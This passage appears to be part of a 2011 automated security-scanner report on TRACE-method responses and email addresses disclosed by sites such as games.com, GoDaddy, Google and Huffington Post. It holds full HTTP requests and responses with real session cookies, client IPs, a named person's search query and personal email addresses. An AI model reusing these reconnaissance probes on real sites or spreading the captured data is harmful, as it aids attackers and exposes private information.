Host: www.dailyfinance.com
Cookie: 1690502dfd21ec63
Connection: Keep-Alive
X-LB-Client-IP: 64.12.173.49
X-Forwarded-For: 173.193.214.243,64.12.173.49
X-CHAD: 6:1:22:43BE:200483,x-lb-client-ip:ajg_u


18.6. http://www.dooce.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: e83399b35ee8b978

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: e83399b35ee8b978


18.7. http://www.mmafighting.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mmafighting.com
Cookie: fe6cb9d1815c28a3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mmafighting.com
Cookie: fe6cb9d1815c28a3
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:22:EFBD:200483,x-lb-client-ip:ajg_u


18.8. http://www.moviefone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.moviefone.com
Cookie: 5f1a0b59b4bf2237

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.moviefone.com
Cookie: 5f1a0b59b4bf2237
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:19:B986:200483,x-lb-client-ip:ajg_u


18.9. http://www.popeater.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.popeater.com
Cookie: 3c494aeadfb16927

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popeater.com
Cookie: 3c494aeadfb16927
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:27:4BD6:200483,x-lb-client-ip:ajg_u


18.10. http://www.truveo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.truveo.com
Cookie: 99c70a0bf2084743

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.truveo.com
Cookie: 99c70a0bf2084743
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243


18.11. http://www.tuaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tuaw.com
Cookie: b86452e58c6d22a4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tuaw.com
Cookie: b86452e58c6d22a4
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:22:90FB:200483,x-lb-client-ip:ajg_u


18.12. http://xml.truveo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xml.truveo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: xml.truveo.com
Cookie: c5647c4367687c01

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: xml.truveo.com
Cookie: c5647c4367687c01
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243


19. Email addresses disclosed
There are 18 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. http://www.dailyfinance.com/markets/mostactives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The following email address was disclosed in the response:
  • MoneyComments@aol.com

Request

GET /markets/mostactives HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:29 GMT; Path=/
Content-Language: en
Content-Length: 90327
Keep-Alive: timeout=5, max=1000
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers: Most
...[SNIP]...
<a href="mailto:MoneyComments@aol.com">
...[SNIP]...

19.2. http://www.games.com/browse-games/all/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /browse-games/all/

Issue detail

The following email address was disclosed in the response:
  • larryc@games.com

Request

GET /browse-games/all/ HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:15 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:15 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm294 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<meta property="og:email" content="larryc@games.com"/>
...[SNIP]...

19.3. http://www.games.com/game-play/family-feud/single

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /game-play/family-feud/single

Issue detail

The following email addresses were disclosed in the response:
  • larryc@games.com
  • yourfriend@email.com

Request

GET /game-play/family-feud/single HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:16 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:16 GMT; Path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 31490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm234 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<meta property="og:email" content="larryc@games.com"/>
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: Family Feud. Play Free Online Games on Games.com </title>
...[SNIP]...

19.4. http://www.games.com/game/family-feud/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /game/family-feud/

Issue detail

The following email addresses were disclosed in the response:
  • TOSProfileReport@aol.com
  • larryc@games.com
  • yourfriend@email.com

Request

GET /game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483 HTTP/1.1
Host: www.games.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 00:59:42 GMT; Path=/
Content-Length: 72850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm294 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<meta property="og:email" content="larryc@games.com"/>
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: Family Feud&body=http://www.games.com/game/family-feud/" title="Family Feud | Play Family Feud Free Online | Games.com</title>
...[SNIP]...
<a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%20ID:%20335%0A%0AReview%20ID:%20urn:x-aol:oid:mddn:4156c431-
...[SNIP]...
<a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%20ID:%20335%0A%0AReview%20ID:%20urn:x-aol:oid:mddn:6e9c3beb-
...[SNIP]...
<a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%20ID:%20335%0A%0AReview%20ID:%20urn:x-aol:oid:mddn:3f911a36-
...[SNIP]...
<a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%20ID:%20335%0A%0AReview%20ID:%20urn:x-aol:oid:mddn:f2bc52a0-
...[SNIP]...
<a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%20ID:%20335%0A%0AReview%20ID:%20urn:x-aol:oid:mddn:e795563e-
...[SNIP]...

19.5. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • YourEmail@YourWebsite.com
  • marketing@godaddy.com
  • sitesuggestions@godaddy.com

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.6. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following email addresses were disclosed in the response:
  • YourEmail@YourWebsite.com
  • marketing@godaddy.com
  • sitesuggestions@godaddy.com

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.7. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following email addresses were disclosed in the response:
  • YourEmail@YourWebsite.com
  • marketing@godaddy.com
  • sitesuggestions@godaddy.com
  • support@godaddy.com

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest i
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.8. http://www.google.com/s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /s

Issue detail

The following email address was disclosed in the response:
  • bjor...@lumeta.com

Request

GET /s?hl=en&sugexp=ldymls&pq=bucky%20a%20jordan&xhr=t&q=Bucky%20A%20Jordan%20A&cp=16&pf=p&sclient=psy&source=hp&aq=&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=2be2441b25e78025&biw=907&bih=1007&tch=1&ech=2&psi=YA_CTavYJIXUgQeEwdG4Dg.1304581553510.1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:45:59 GMT
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: application/json; charset=UTF-8
Pragma: no-cache
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 103094

{e:"Zw_CTcnvLsrysga2jvnbDw",c:1,u:"http://www.google.com/s?hl\x3den\x26sugexp\x3dldymls\x26pq\x3dbucky%20a%20jordan\x26xhr\x3dt\x26q\x3dBucky%20A%20Jordan%20A\x26cp\x3d16\x26pf\x3dp\x26sclient\x3dpsy\
...[SNIP]...
\\x3e\\x3cdiv class\\x3d\\x22s\\x22\\x3eFrom, Sent On, Attachments. \\x3cem\\x3eBucky Jordan\\x3c/em\\x3e, Sep 18, 2006 12:23 pm \\x3cb\\x3e...\\x3c/b\\x3e From: \\x3cem\\x3eBucky Jordan\\x3c/em\\x3e (bjor...@lumeta.com). Date: Sep 18, 2006 12:23:17 pm \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3cspan class\\x3df\\x3e\\x3ccite\\x3emarkmail.org/message/5wmsv36cbmj52zkm\\x3c/cite\\x3e - \\x3cspan class\\x3dgl\\x3e\\x3ca
...[SNIP]...

19.9. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:
  • bjor...@lumeta.com

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:45:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84171

<!doctype html> <head> <title>Bucky A Jordan - Google Search</title> <script>window.google={kEI:"YA_CTavYJIXUgQeEwdG4Dg",kEXPI:"17259,24472,25907,27147,28505,28514,28766,28887,29481,29509,29681
...[SNIP]...
</em> (bjor...@lumeta.com). Date: Sep 18, 2006 12:23:17 pm <b>
...[SNIP]...

19.10. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The following email address was disclosed in the response:
  • world@huffingtonpost.com

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:40 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 469486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:world@huffingtonpost.com">world@huffingtonpost.com</a>
...[SNIP]...

19.11. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The following email addresses were disclosed in the response:
  • jason@huffingtonpost.com
  • media@huffingtonpost.com
  • tv@huffingtonpost.com

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
